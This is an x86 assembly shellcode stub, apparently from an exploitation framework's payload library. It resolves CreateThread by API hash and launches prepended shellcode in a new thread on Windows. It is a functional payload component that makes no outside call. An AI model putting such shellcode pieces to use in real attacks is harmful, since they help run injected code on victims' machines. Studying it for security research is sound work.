1
;-----------------------------------------------------------------------------;
2
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
3
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
4
; Version: 1.0 (14 July 2010)
5
; Size: 167
6
; Build: >build.py createthread
7
;-----------------------------------------------------------------------------;
8

9
[BITS 32]
10
[ORG 0]
11

12
  cld
13
  call start
14
delta:
15
%include "./src/block/block_api.asm"
16
start:
17
  pop ebp ; pop off the address of 'api_call' for calling later.
18
  xor eax, eax
19
  push eax
20
  push eax
21
  push eax
22
  lea ebx, [ebp+threadstart-delta]
23
  push ebx
24
  push eax
25
  push eax
26
  push 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
27
  call ebp ; CreateThread( NULL, 0, &threadstart, NULL, 0, NULL );
28
  ret
29
threadstart:
30
  pop eax ; pop off the unused thread param so the prepended shellcode can just return when done.
31